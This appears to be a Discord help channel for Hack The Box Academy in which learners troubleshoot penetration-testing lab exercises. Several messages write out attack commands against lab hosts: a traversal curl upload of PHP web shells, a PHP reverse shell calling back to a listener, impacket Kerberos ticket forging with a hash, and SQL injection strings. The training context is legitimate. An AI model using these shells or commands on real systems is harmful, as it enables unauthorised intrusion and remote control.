#modules
I did! It gives something like 'Host is up' with no particular info
here
the command was 'nmap -sC -sV -Pn IP'
Also #starting-point ... with the name of the starting point lab you're working on
By default nmap will scan the most common 1000 ports, it seems like no service returned anything. Likely indicating the host is down or you don't have a route to that IP
It is hard to say what the issue is without more context/visibility
it happens with all the machines so I thought it didn't matter
if it's a starting point machine; #starting-point is the appropriate channel; i'll be willing to try and help with basic troubleshooting there to be sure it isn't a PEBKAC issue before directing you to support
oh im sorry
@patent sky the module is above tier 0; please refrain from sharing info from the module. I generally suggest though to restart your VM and try again
Oh sorry, I did restart my VM, it doesn't change anything.
did you try switching to tcp or udp vpn, or changing vpn regions?
Thank you, it was just a VPN problem... I am so dumb!
can anyone help with this API attacks module? I'm stuck, guys
Exploit another Unrestricted Resource Consumption vulnerability and submit the flag.
I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - I have logged into the target with
sqsh -S 10.129.203.12 -U htbdbuser -P MSSQLAccess01! -h, but once I'm in, I can't get anywhere. I have tried listing the DBs with SELECT name FROM master.dbo.sysdatabases, but then I can't select any of them with USE master for example.
how long should i expect winpeas to take? ive had the target despawn on me twice after running for over an hour and forgetting to extend time
Pretty sure only a few mins is good enough
never seen it take anywhere near a single hour let alone several
Sometimes powershell goes 'idle' and pressing a character wakes it up
yea im going along with pen test in a nutshell and it has the output going to a file so nothing is being printed to the screen and it just blinks the cursor, system monitor shows activity but i was letting it run in the background while i work and the target machine despawned before it finished
i would wiggle the mouse through remote desktop and the vm stayed responsive the whole time i was paying attention, more than 30 min run time
linpeas worked just fine on the linux host
on File Upload Attacks -> Limited File Uploads I never get a response from the server on uploading the payloads.
Tried both in-browser and via burp repeater; there's just no response from the server at all. Been trying for a couple of days. Not a 500 or any kind of response on upload / POST request. Request doesn't hang either- just nothing. No follow-up GET / after upload either
Can't do it over HTB VPN or in the attackbox, because the vpn can't reach the site. (Why isn't it behind the VPN?) so using a kali vm. I've tried on bare metal on multiple machines and networks now, and it just doesn't work.
I see that others have this issue, but no one ever mentions a fix. Can someone please save me from this insanity. thanks.
hi so for question 1 of the skills assessment of the incident handling process module, I am having trouble accessing Virus Total, which I need to access for the section. I tried chatgpting the process to access virus total but the instructions it gave me on how to do it from TheHive won't work.
can someone point me in the right direction?
When recompiling using javac -cp it gives me many errors. I am in exploiting web vulnerabilities in Thick Client Applications, please help!
I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - When I try to crack the hash using hashcat and the pws.list provided in the module, I get nothing. I've also tried rockyou.txt as some have suggested, still get nothing. Any clue?
Good evening, can someone help me with the password attacks module? Pass the certificate.
The hash I got is easily crackable with rockyou
Where are you stuck ?
Hi there y'all, sorry if this is a silly question, but anyone know where in GraphQL was mentioned or found (previously) the way to identify the MD5 hash for a password in Mutations chapter?
Question two, administrator flag...
Maybe go DM to avoid spoiler
Wrong IP or you are not connected to the VPN
but i am in htb instance
Ip is correct ?
yes
i have tried multiple vpn servers
hold up lemme try n wait for 5 minutes as u said
i don't think it makes a difference but nvr too wrong to try
can ping but port 3389 is closed
So you won’t be able to connect via RDP
any other way
What ports are open ?
need some help connecting to a wifi network in the **Attacking WPA/WPA2 Wi-Fi Networks** module Enterprise Evil-Twin Attack section. i have all the needed info: domain, username, password, and even cert but still can't connect to the wifi network. furthermore, i even spoofed my mac address to connect however it didn't work... can someone help me? am i missing something??
You need to make sure all the settings are correct when connecting. There's more to it than what you listed.
are you talking about the eap auth method?
You also don't need the domain, the domain prefix in the username is fine
Not just that
@cloud urchin what else? the previous module i took, Wi-Fi Penetration Testing Basics, doesn't list any other prerequisites i need to connect to a wpa/wpa2 enterprise network. would you mind shedding some light?
or anybody else willing to shed some light for that matter?
You can DM me if you want
Any help please...
Does the entire AD Enum and attacks module HAVE to be done from the linux VM provided in the module?
Hey guys, currently doing the "Footprinting" module, lab "easy". Can I DM someone about the enumeration? ||I don't get the part with /etc/hosts at all, I'm familiar with the process of doing it but in this scenario I don't understand the logic behind it||
dm me
I just completed the thick application modules in attacking common applications. They were the worst two sections in the module. They took me many hours. I just followed the steps but I don't understand why they were included in the course material. The steps I did can apply only to this specific case as I did not receive any general knowledge which can apply in general cases. Please tell me that they are not needed for the exam
No one can say what's on the exam. Your complaint is a pretty common one though.
Bruh I mean I am really frustrated. The module was going very well and straightforward until those two sections
Hi
Who can help me with the CWEE path?
I am stuck at NoSQLI skill assessment ll
It's there just to give you a taste of a bit of application reverse engineering and source code review
Have to prepare the mental for the exam, what if you come across it? Or better yet, in the wild. Is your client going to be happy you didn't test a thick application which then was compromised?
Hello, anyone who can help me in "Attacking Wi-Fi Protected Setup - Skills Assessment"? I am stuck in the VirtualCorp PIN finding process, in which i noticed that the WPS AP is locked and then there is no way to unlock it? Is this correct behaviour?
Hi, does someone know how DonPAPI works?
does it dump credentials from credential locker remotely?
Can I DM please, am stuck at assessment under system information
hello everyone, I am just starting this adventure and finished the network fundamentals. Last module, called skill assessment, there are 3 things to do. I am stuck at chapter 3, target acquired. I need to establish a raw ftp connection with netcat. well, this somehow doesn't work. I cannot log in. They say to login with:
USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]
but i just keep getting the error 451, wrong parameters. Anyone having the same problem? I am very thankful for any hints and helps
the things in brackets are telling you to use those key combinations
hey
in
Android Application Static Analysis
Reversing Hybrid Apps
how should i solve this?
Analyze the APK found inside the attached ZIP file. What is the value of the "message" key after logging into the remote service using the debugging code?
i only have one temp debugging key
my god... this took me a while... thank you, it seemed to work now. Thanks for the fast reply.
you solved this?
have patience, don't ask multiple people in the span of a minute
if the people you're asking are in the US, it's early morning still for them
ok i solved it
it was so easy, i had a typo
|| only send post request with temp_debugging_key ||
Is lsass.exe invoked during local/AD auth process only?
Or during remote auth as well?
LSASS is invoked during both local and remote authentication and on both sides (client and server) of the connection, depending on where credentials are verified or generated.
About remote do you mean AD environment?
for example, for outlook logon, is lsass.exe invoked?
LSASS is invoked whenever Windows integrated authentication (NTLM/Kerberos/Negotiate) is used, whether locally or remotely.
It is not invoked for purely application-level or web token–based authentication (like modern Outlook/Office 365 logons). Someone can correct me if I am wrong, though.
This is the schema about the lsass.exe process, the last point in the remote auth is "AD directory services", why?
seems like it's mixing AD and remote service
The last point “AD Directory Services” exists because LSASS (on the DC) must query the Active Directory database to validate the user’s credentials or tickets during remote/domain authentication. This is what I think.
so if login in outlook for example, that point doesn't exist?
there isn't a complete explanation of this schema in this module
When Outlook isn’t using AD-integrated authentication, the “AD Directory Services” part of the diagram does not exist in the flow, because the verification is handled elsewhere (cloud, app layer, or external server).
I think you should use that image in AI to get your queries cleared.
I'm doing this for hours and hours, but 1 query recursively produces 2+ more queries lol
this part is not easy
Hello! I'm taking a module related to SCCM.
https://academy.hackthebox.com/module/267/section/3048
I can't run .\pxethief.py correctly. An error occurs when connecting to host 172.50.0.30. What should I do? I've rebooted the lab several times.
Error
anyone?
I'm doing everything as in the module; it's a simple command, but the connection isn't working. I don't know how to fix the lab..
Switch to the US VPN region
What's the difference?) The connection to the lab itself is stable.
anyone help?
I did this. It didn't help
Hi,
Who can help me with cwee nosqli assessment II?
i am stuck in the question "What is the name of the Program listening on localhost:5901 of the Pwnbox", the answer xtigervnc is right or wrong..
What module is this?
Module: SQL Injection Fundamentals
Section: Skill Assessment
Link: academy.hackthebox.com/module/33/section/518
In the previous section (reading files) it shows you how to ||check if current user has permissions to read file.||
When I try the same method here that is ||super_priv|| with the ||union injection|| it does not work / throws internal error
Exact Command Used:
||cn') UNION SELECT 1,2,super_priv,4 FROM mysql.user-- ||
Is this because ||super_priv|| doesn’t always exist or ?
for the information gathering web edition fingerprinting, i cannot seem to be able to connect to the vhost. would this require me to ||change the local /etc/hosts file?|| or can it be done another way?
did you add the vhost in your /etc/hosts?
nope did not try. i thought it would be an option to specify it in nikto but i couldn't seem to find it. trying the /etc/hosts file was not something i did think about, thank you
If a virtual host does not have a DNS record, you can still access it by modifying the hosts file on your local machine. The hosts file allows you to map a domain name to an IP address manually, bypassing DNS resolution.
I'm totally blind in the Injection attacks module's skills assessment. I'm unable to get the flag, I tried js injection to get /etc/passwd, what should I do after? can anyone plz help me?
you can dm me
Hello everyone, I hope you guys are doing well. I am currently in the skill assessment of Pivoting and Tunneling in the CPTS path module, I am facing a problem which is kinda weird to me.
I am doing these labs using the tool ligolo-ng I have my pivot host and configured it properly and took access on the internal host
within that network, and when I write ipconfig to see what is the other network I see the same network address but I can't reach it which is x.x.15.34 < this is the one I can ping with ligolo configured.
but the internal host has a second ip which is x.x.16.34 that I can't ping 😄 I already configured ligolo on x.x.0.0/16, I did try double pivot with the same network address but it doesn't work.
because it's the same network address I guess
can i request for help on the ntlm relay attack question 2..compromising the backup01? i keep getting this error message
[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
seems like the spoolss is not running
do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND
You ever get this sorted? I've been stuck on this for most of the morning... I feel like I'm missing something SUPER simple haha.
is this to compromise vhost of mail.smtpinjection.htb?
I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?
Might need to escalate privileges somehow..
ever tried force authentication?
Sorry, I don't understand what you mean. I have already searched and tried but still can't get past this.
perhaps registration can help you
Already tried registration and put the invitation code too but still no clue. Maybe I'm using the wrong technique.
focus on the request being made; that'll be your only hint
@civic inlet Do you mean using the IMPERSONATE function?
I tried that, but didn't get any response
Can I get some hands on advice for the optional exercise in the Cracking Passwords with Hashcat module?
I have made some progress but I don't have much (any) experience exploiting active directory so it's a bit lost on me, even though I have cracked a fair few of the hashes
finally after 15 weeks 🙌
@fathom pendant please may I dm you regarding the cpts path. Regarding a topic that's mentioned but I can't see the how-to-accomplish-it side of things.
Awesome work! Great job
which vpn server are you using?
hi!
This module is a real problem..
I changed VPN servers, rebooted the lab multiple times, and on one attempt, the server responded to my command. Instead of a DHCP error, I finally got a response from the server, extracted the hash, and cracked it
But now I have another problem. I'm struggling with the following module page, https://academy.hackthebox.com/module/267/section/3050
I launched the lab, configured Ligolo, and ran all the commands as in the course. But the tables I'm seeing are half-empty, even though they should show complete information.
If you think there's an issue with the labs itself, best to post in #1234357888114364508
Also please take care not to post content from modules above tier 0
There are probably some problems with the SCCM server again. I've rebooted the lab many times already, but it doesn't help. Neither does changing VPN servers.
yeah this one's known issue we are working on fix. though it was working fine on US Server afaik.
What's the problem, even superficially? The lab starts up, the Windows machine works, I can connect via RDP, and the desired host can be pinged through ligolo
Until this moment, I didn't know there was a problem in the lab. Again, you're scolding me for trivial things))
How did I scold you? I just said if you think there's an issue you'd want to report it in #1234357888114364508.
The posting above tier 0 is just a general thing
You scolded me for the screenshot and deleted it, citing the disclosure of confidential information.
Two separate things, and it's a terms of service thing I wouldn't really call it trivial. Not like I muted you or something I just reminded you of the rule.
calm down guys!! He was just informing you about that not scolding you.
Okay, I won't argue. There was already a long dialogue in the chat about the overly harsh policy few weeks ago, which led to nothing.
This chat is for asking only basic questions about basic problems. If you have complex technical issues with labs, instruments, or infrastructure, this chat is useless. Unfortunately, an abstract description of the problem doesn't convey much information((
@raven quail Thanks for your response! I hope the problem gets resolved soon.
hello i am currently working on a linux module and trying to connect to ssh but when it asks for my password it will not let me type in the CLI
Well think about it this way, anyone who has completed the module knows exactly what to do and doesn't really need a lot of detail. Also if you feel like you need to reveal a little more you can take it to DMs.
Hi. I'm working on the Citrix Breakout submodule in Windows Privilege Escalation. I tried to connect to the SMB from the target using \\10.xxx.xxx.xxx\share as the UNC path.
In addition, I have connected to the smbserver.py in the XFCE box, but the Citrix couldn't connect to the SMB and instead, it returned an error like this image
Are there any workarounds for this?
Hey, can anyone help me in the module "Information gathering - web edition" and the section "Web Archives". So in question number 4 it is not accepting my answer, can anyone tell me what is happening?
dm me
Recall what was taught in the Pivoting, Tunneling, and Port Forwarding module regarding IP addresses and subnets
module: https://academy.hackthebox.com/module/110/section/1054#questionsDiv
hello
What could be the problem? My "admin" request returns a 302, not a 200.
looks like you might be fundamentally misunderstanding the question:
you're meant to fuzz the ip:port and the GET request should look something like
GET /admin/§FUZZ§.html
Is this normal? Even when I log in manually, I get a blank page.
you don't need to log in; you're fuzzing for an html page :)
think of it like this; you're looking for a file at http://ip:port/admin/somefile.html
Is the job role path Bug Bounty gone? It still changed its name.
It's CWES now - Certified Web Exploitation Specialist. Path itself has changed a bit #📣-announcements message
is there a reason some of the machines spawned for the exercises are on the open internet and some get spawned in the htb network and need a vpn to access?
I feel like they used to all be internal, but more and more they are just spun up on the open internet
generally speaking; it depends on the focus of the module and section.
the open internet questions, for instance, aren't going to require a reverse shell or callback to complete
for example I am doing the "hacking wordpress" module atm, the machine is on the internet and one of the exercises is to put a web shell in the theme
yes web shell, not reverse shell :)
I guess my question is, why put some on the internet at all, why not keep them all internal?
resource stuff; also a lot easier/cheaper to host basic web apps on a droplet than a dedicated vm for one thing (if the underlying OS isn't what's important)
that makes sense, I guess as htb has scaled they looked for more cost effective way
I feel like in the beginning it was all internal machines
well, some of the modules predate some of the bigger scaling they've done and still have the ip:port, but again as a general rule of thumb -- if it's a public IP - focus on the app (unless instructed otherwise) and not on getting a reverse shell or a way for the machine to call back to you
it's a common hiccup in the Getting Started module - Public Exploits Section. People do all this scanning on the public IP, they don't focus on the IP:PORT -- which contains the vulnerability
For me it raised the question, is there some sort of "permission to attack" baked into the HTB academy TOS? Since these machines are technically just public facing machines and we are attacking them over the internet
they are owned by HTB
the Intro to Academy module (https://academy.hackthebox.com/module/details/15) talks a bit about it
Module: DACL Attacks II
Section: SPN Jacking
Question: Abuse Gabriel's rights to compromise the account that has WriteSPN on SRVWEB07. Use the live SPN Jacking technique to compromise WEB01 using SRVWEB07 SPN and read the flag located at C:\Users\Administrator\Desktop\flag.txt.
I followed every step / command shown in Live SPN Jacking but it gives me an error when trying to connect to WinRM.
Tried to change the SPN to HTTP/WEB01, WSMAN/WEB01, HOST/WEB01, and even tried RDP with TERMSRV/WEB01.
Nothing is working.
Now I did the same from linux, still not working.
└─$ impacket-getST -spn 'MSSQL/SRVWEB07.inlanefreight.local' -impersonate Administrator 'inlanefreight.local/SRV01$' -hashes :04ff9221b8cdb658d989473f51ae0a42 -dc-ip 172.16.92.10 -altservice "cifs/WEB01.inlanefreight.local"
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from MSSQL/SRVWEB07.inlanefreight.local@INLANEFREIGHT.LOCAL to cifs/WEB01.inlanefreight.local@INLANEFREIGHT.LOCAL
[*] Saving ticket in Administrator@cifs_WEB01.inlanefreight.local@INLANEFREIGHT.LOCAL.ccache
┌──(kali㉿kali)-[~/htbacademy]
└─$ export KRB5CCNAME=Administrator@cifs_WEB01.inlanefreight.local@INLANEFREIGHT.LOCAL.ccache
┌──(kali㉿kali)-[~/htbacademy]
└─$ impacket-smbexec -k -no-pass 172.16.92.25
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
nvm, finally did it after a LOT of debugging.
hello, I am on the pass the ticket module for linux (https://academy.hackthebox.com/module/147/section/1657). I am needing help understanding decrypting a hash for the svc_workstations account. when i did the dump i only found a hash for aes-256, which i tried hashcat and crackstation on, with no luck. the hint says are there any other keytabs, i found that user and cracked the NTLM hash, but could not ssh with -p 2222 with that user. I used process of elimination, and guessed the password for the svc_workstation account, but i would really like to understand what to do when running into an aes-256 hash like that, any help would be appreciated
you don't need to crack the aes-256 part; NTLM will do
hmmm, it wasn't displaying the NTLM for that user
this is what i got
i did find the NTLM for the other user's keytab, but i couldn't log into the target with that
There is another way to check for known hashes on the internet
Hi, I have been working on the LFI skill assessment and am struggling to find uploaded files. I was able to achieve read access and the php ini file does not have an upload dir set, so it should default to system. But when I upload a pdf and try to read it in /tmp or /var/tmp it cannot be found.
It also cannot be found in the uploads section of the site.
There is more information I can provide if anyone is open to dm, trying to be careful and avoid spoiling.
maybe check if something is happening to the file when you upload it 😉
@lone ferry those would be subdomains
Ffuf works, gobuster doesn't, wondering why
is inlanefreight.local in your /etc/hosts file?
Yes
also did you try adding --append-domain ?
That works. Should add that to the walkthrough writeup.
also you said 'Attacking Common Applications' Skill Assessment 2?
Yes. Thanks for the help.
that's the first SA, not the second
wait nvm
my brain had stuff flipped
lol been busy lately
Please read the show solution for 2.
i was thinking 3 not 2
Ok. Cheers
also don't share solutions from the official writeup; especially since the module is above tier 0
Just got it 🙂 Spent the past 2 hours troubleshooting payloads and paths only to realize cyberchef was including a new line the entire time.
Hey I am on attacking common applications -> attacking applications connecting to services. However I can get the sql credentials as shown in the course. I get an error about memory.
You don't need WinRM to read a file.
hi so for the skills assessment of incident handling process, how do I access VirusTotal?
I need to know that much for question 1 so I can solve the question
I looked for it and tried chatgpting it and didn't get good results
can someone give me a hint?
I am gonna google it but the results on YouTube aren't very good either
To access VirusTotal you first need to navigate to it, the UI is quite self-explanatory on how to use it
I'm trying to import a ccache file on question 5 on the pass the ticket linux section of the module (https://academy.hackthebox.com/module/147/section/1657), i don't want to paste a screenshot as its the commands and don't want to spoil anything can anyone help? when i run klist it doesn't seem to be using the ccache even though it shows it when i use klist
I looked it up and to go to virustotal, I need to access the web app's IP on port 9001 and it won't let me connect
so that already is not self-explanatory
are you going to virustotal.com lol
Hey guys,
Anybody here who would kindly help me a bit with the final skill assessment in SQL Injection fundamentals? I am a little lost after a few steps
If anyone can please DM me so i can share the screenshot, maybe i am doing something wrong or missing something
Quick question:
If curl -k <ip> | grep -i '/themes/' finds the theme
Why doesn’t wpscan?
Because for some reason wpscan works better with an api token
I had a lot of fun with wpscan
Try to construct a comprehensive wpscan for a good output
It came in handy with a lot of CTFs
hey guys, just started the public exploit module. Upon running the exploit it works perfectly fine on the HTB terminal and I retrieve the flag, however when i run the same setup on my kali machine, it gives a "server did not respond in an expected way". I can ping the IP, visit the website from my kali machine, but there seems to be some connectivity issue i can't pinpoint. I've double checked all my settings for the exploit, firewalls, vpn, even manually tried to retrieve the file and it didn't work. Anyone that can help or had the same issue, please let me know.
try resetting the lab and trying again
I did that 3 times already to be sure, and I can successfully run the exploit on the HTB terminal so no issue there.
not sure what could be wrong with your kali machine then ¯\_(ツ)_/¯
already tried to register and modify the invitation code then forward the request but got this error. how then?
interesting, from my kali machine i can telnet to the ip:port, i can visit the website, but running the exploit, it doesn't establish the connection.
can someone figure out why it is taking infinity to run winPEAS on the windows target
done the reset of servers and instance, what's blocking it i don't know
The target machines do not have internet access so attempting to download winpeas through them will always fail
nvm didn't see the terminal on the right but you can probably open another terminal or folder and check the contents of the output file
Happens a lot, for the most part it gets stuck on a section "collecting firewall rules" , you gotta press enter to engage it back, and the next part it gets lost is the "search for credentials" or smth like that.
But yeah as 0x said, check the file with the output.
Tried SMB and RDP, didn't work too
Yes i have completed the AI Red Teaming Track. Thanks for checking.
i would always just rdp with a folder mount for transferring tools when i had issues, but why are u trying to output it as a txt lol
windows behaves very strangely with Linpeas and i am new to powershell and found the file is already downloaded to the folder, no blink or success message, no exit code to verify.
The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.
For some reason, the top-usernames-shortlist.txt file didn't find anything.
From the error it looks like you fuzzed directories not the cookie
thanks
I also tried b*main+433 but it won’t show me register values
Hello.
I am doing the SQL Injection Fundamentals module and I am a little stuck on the final assessment.
I can make an account with an SQL injection and log in, but I don't know what to do next. Could somebody please point me in the right direction? I can't for the life of me figure out what to do next. There are no responses, no outputs, just always either html error 500 or nothing really happens when I try to play with the burp suite requests.
Dm pls if anybody could help
Hello, I'm working on the Skills Assessment - Password Attacks.
I'm having trouble getting ligolo to work properly while working on it. Is there any solution?
@Module: Password attacks, credential hunting in Linux. I'm not getting how to solve this one. I got access to the logins.json but the username and password were encrypted. I'm not able to get the firefox_decrypt tool onto the target machine
You were able to bring over the firefox_decrypt tool, but couldn't get it to run or work correctly?
Hello, windows fundamentals appears to be broken, both smbclient -L SERVER_IP -U htb-student and smbclient '\\SERVER_IP\Share' -U htb-student are broken, they return NT_STATUS_IO_TIMEOUT, I tried tweaking the smb.conf to maybe adjust the min and max protocol but nothing works 🙁
can something be done about it?
how you fixed it? thanks
image?
from what I can see its been an ongoing issue for over a year with this specific module, it would be great if someone would take a look into it
no ligolo to work properly
Sorry, I managed to figure it out on my own.
that's what I am asking - what did you do to make it work properly? thanks
Oh, I see !
I changed the MTU value.
For details, I resolved it by executing the command below.
sudo ip link set tun0 mtu 1300
Nice, I'll note this down.
hello guys, there is new update in sql injection fundamentals, skills assessment, who is able to help me with last question?
I always do this whether I'm working on labs or academy
Set the MTU 1000
Hi everyone, are there some modules about AD to learn it? The password attacks module talks about AD but i don't know what it is
Yes Introduction To Active Directory and AD Enumeration & Attacks
Compromise BACKUP01 and then submit the flag located at 'C:\Users\Administrator\Desktop\flag.txt'
someone to assist me here.. i think i know the way but it's not working
Hi everyone,
I finished the "Pivoting, Tunneling, and Port Forwarding" Skills Assessment.
But i have a question :
sudo proxychains nmap -Pn -sT -v ip -p 3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server
proxychains nmap -Pn -sT -v ip -p 3389
PORT STATE SERVICE
3389/tcp filtered ms-wbt-server
Is this normal? They don't talk about this in the modules and I wanted to know why, but even the cat struggles to explain
I have problem with getting accepted HTTP methods in Bypassing Basic Authentication section in Web Attacks module.
I used the command curl -i -X OPTIONS http://<HOST>:<PORT>/, but got a HTML document without Allow response header.
Does anyone know why this behavior occurs?
yes, it's normal, typically speaking sudo is gonna be required for proxychains
it's just not set up to tell you what's allowed, you can ignore this and move on
For real, on many walkthroughs I didn't see it. Is there a reason why it needs sudo?
nmap needs it for raw packets
yeah it might
Isn't it on by default?
no
On kali I mean
Don't use kali that's why I ask
If you know what you're doing then it's not an issue, but I do agree with you in general.
Kali USED TO have it where your login was root:toor; but then they changed it to a user:pass for the premade VMs
you're insane; sanity: checked
(i haven't done that module, but it also helps to say which section you're having trouble with)
Someone?
For the Information Gathering - Web Edition skills assessment, I cannot seem to get to the target "hidden admin directory". I know what the directory is but it just does not let me access the directory. (fixed)
which section?
dm me
The one with sharing the folder. I'll have to check with vanilla settings and turning off the firewall for private, because I tried it with an adjusted config
But I don't know if this is a confirmed solution
Kinda frustrating since it looks like a known issue that has not been addressed whatsoever
can you tell me the exact section you're referring to?
NTFS vs. Share Permissions?
On Windows Fundamentals
under NTFS vs. Share Permissions
Yeah, sry, had to find it
Since I'm at work rn
There's no SMB port open, so you can't use smbclient. Just use RDP to answer the questions.
I tried opening port 445
But it didn't help either
You don't have the permission to open it. Just a basic user is provided to solve the questions.
I mean, on the pwnbox I have sudo, would it have to be opened on the server?
No, for what exactly?
So should using iptables be enough to open port 445 via sudo on the host to make it work? Because it doesn't in this case
I don't understand what you mean then; if it doesn't have to be opened on the server but rather the host, it has been done
in the module it's just shown as an example, I don't think you have to actually use smbclient
Hey guys, I'm working on the Advanced XSS and CSRF Exploitation - Skills Assessment. I'm stuck at the last part. I've tried variations of the payload shown as an example in that section of the module, but I either get no response or I get ||{"error":"Something went wrong"}||. I know what I'm supposed to do, but I can't seem to figure out how to correctly modify the payload. Is anyone available for help?
Hi,
Sorry to bother you,
But when I checked on HTB Academy they don't specify to use sudo.
Neither in the walkthrough, where we can see if the terminal is root or not.
Am I wrong? Because if the course said to use this command I wouldn't think to use sudo.
Unlike nmap, where sudo needs to be used for a SYN scan
It's mostly because of how proxychains works, not necessarily nmap in this instance.
Is there an issue with the HTB academy atm? All locations are showing 100000ms and I can't seem to start an instance
That's usually a connection issue or error on one end. https://status.hackthebox.com ; i also suggest logging out then back in and refreshing cache [ctrl+shift+r]
Reload your page
Thanks, that solved it
that new blue team cert coming soooooon
Hi, I am unable to get this answer right in the static analysis of Android application module
Any idea?
@blazing cloak Please don't post content from modules above tier 0
Oh sorry, where can I ask for help on this server?
Here, just don't post content from modules above tier 0
haha sure, my bad
Hey guys, I've been stuck for some time on the question of cracking the hash of Mark's password. There is some information about him from which I am supposed to generate a wordlist, then mutate it and then perform a dictionary attack. But it seems like my mutated list isn't working. Any help / advice? Thanks in advance
Module: Password Attacks
Section: Writing Custom Wordlists and Rules
Yes
You can DM what you are trying.
@boreal basalt don't DM people without asking
?
I think you are trying too hard
In the section, information is displayed; you need to create a password with it
It's very simple, just add the information and create a long enough password (minimum 12 characters, etc.)
You sent a dm request earlier
Why? For help, I can't?
No. I didn't ask you to, and you didn't ask to. See #rules; the only exceptions are for server moderation issues (reporting another user) and what's in my bio.
You're right, my bad
I've added it to a .list file and added 1 word per line and also made the minimum length 12. Is this the right way?
You know a password is a sequence of words, so you've got step 1: create a list
But now you have to use the hashcat rule to create a password like Password2022, Password2022! that is at least 12 characters
If you don't understand, reread the section (for real, this helps a lot)
Hello, can I DM someone for help with the second skills assessment of the AD Enum & Attacks module? I have such a weird thing and I don't want to spoil
$[char] is the format to append a character at the end
(Drop the brackets of course)
Just like with several other modules, the newest one on Forensics on Linux also doesn't let you download the Cheat Sheet. I assume the team is aware of that, considering that there have been a few mentions here on Discord already?
scratch that, seems to have been fixed for the other ones (that I remember), so just for Linux Forensics now
I am on Attacking Common Applications skills assessment 1. I have command execution by appending &<command> to a URL. However, commands such as dir work but whoami, powershell etc. do not. Any ideas?
Well... you're not gonna get an interactive shell solely off of just running powershell via a webshell
Could anyone give a nudge on Abuse taino's rights to compromise SDE01 and read the flag located at C:\Users\Administrator\Desktop\flag.txt DACL Attacks II Skills Exam. I think I have the right idea, just not sure if I'm executing properly
I have an issue with a skills assessment for Windows Lateral Movement. I am on the 4th question, where it asks what the password for the WSUS admin is. Can someone who has done it DM me so I can get a hint or something? I have been doing this for over a week: I did password spraying, I did Inveigh, I tried looking for the files on the WSUS machine, I have tried Mimikatz and also tried others, so I have no clue.
You can DM me
@cloud urchin messaged you.
So what do you suggest? And why won't what I said work?
Does anybody know why I’m getting these errors and how to potentially fix them?
Hey I can't reach the (ACADEMY-PWATTCK-CREDDEV01) for the Attacking Windows Credential Manager in Password Attacks module
I tried a new vpn, and resetting but still nada
Hey, I wanna run a PowerShell rev shell command (e.g. powershell -e <base64>) via the web shell so that I get a connection back on my machine and have an interactive shell. Isn't that possible?
another way would be pulling over an msfvenom exe and running it
Agreed, but shouldn't what I thought work too?
Hi, I am currently doing the Attacking Common Services Skills Assessment Easy module. I am able to get the credentials and searched online and saw 2 methods, via FTP and via SQL.
Can't seem to get the FTP method to work currently. I am able to upload the shells but can't seem to get them to execute. Anyone faced this issue before and managed to get it working?
Can't figure out if it is a directory traversal issue or a wrong revshell issue
Where exactly are you ? Common application or common services ?
sorry typo common services
So far I tried different shells; the latest is PowerShell #3 (Base64). I copied this shell into this:
curl -k -X PUT -H "Host: 10.129.203.7" --basic -u *****:********* --data-binary '<?php shell_exec("SHELL"); ?>' --path-as-is https://10.129.203.7/../../../../../../d.php
Then on another terminal I ran nc -lvnp 8001 but there's nothing after I ran it
looks close just reconsider that shell_exec function, also since it's an LFI, think about where you're putting that data on the machine and how it also needs to be accessible through webpage
You're leaking a password in the URL bar brother! Also just screenshot lol
Shit I just saw that thanks for letting me know lol
still cannot ping or reach ACADEMY-PWATTCK-CREDDEV01 in Password Attacks > Attacking Windows Credential Manager
check if the dit file is the same size
you do realize you're supposed to replace the parameter values right?... like lmhash:nthash is not gonna work cos those aren't real hashes, and I assume that SYSTEM also isn't the system file you grabbed
Hello Guys,
I'm stuck at the GraphQL attacks module on injection attacks. I know that I can select the objects like username, password etc. in the SQLi but I can't select the flag in username?
Can anybody help me or say where my mistake is?
I'm stuck with this too
Inbox for the answer
Hello guys, in the Network Foundations module, in the second question, when I try to answer it doesn't accept my answer even when that answer is the right one. The question is "What is the name of the program listening on localhost:5901 of the Pwnbox?" What should I do?
What's your answer?
VNC (Virtual Network Computing)
Almost correct
Can u show me the answer or no
you gotta be more specific with your answer, there's several different VNC programs out there
Network Foundations module, skills assessment content question 2
i found it
nevermind
Hahaha sorry, I still don't really get it
Tried another shell and another path but it doesn't work either
curl -k -X PUT -H "Host: 10.129.203.7" --basic -u *****:********* --data-binary 'php -r '\''$sock=fsockopen("10.10.14.80",8001);shell_exec("zsh <&3 >&3 2>&3");'\''' --path-as-is https://10.129.203.7/../../xampp/htdocs/d.php
For FTP, so far I know it should upload to HTTPS only. If I upload it to https://10.129.203.7/ I can see it and download it.
so you need to write data to a file on the server, but it needs to recognize it as a php file, like this: <?php if(isset($_GET['cmd']) { system($_GET['cmd']); }?>
a php file with php -r in it won't work
So I uploaded curl -k -X PUT -H "Host: 10.129.203.7" --basic -u *****:********* --data-binary '<?php if(isset($_GET['\''cmd'\'']) { system($_GET['\''cmd'\'']); }?>' --path-as-is https://10.129.203.7/../xampp/htdocs/g.php
successfully
I tried accessing via https://10.129.203.7/xampp/htdocs/g.php
or included a cmd at the back, https://10.129.203.7/xampp/htdocs/g.php?cmd=dir, but I still get a blank page
it might not like the indents or spacing...maybe just --data-binary '<?php echo shell_exec($_GET["cmd"]); ?>' and is just going back one folder right?
You can do it like this:
- Put the info into a local page, and then extract keywords with cewl
- After manually removing some words that are obviously not a part of the password, you can combine them because the password is longer than a keyword. I use
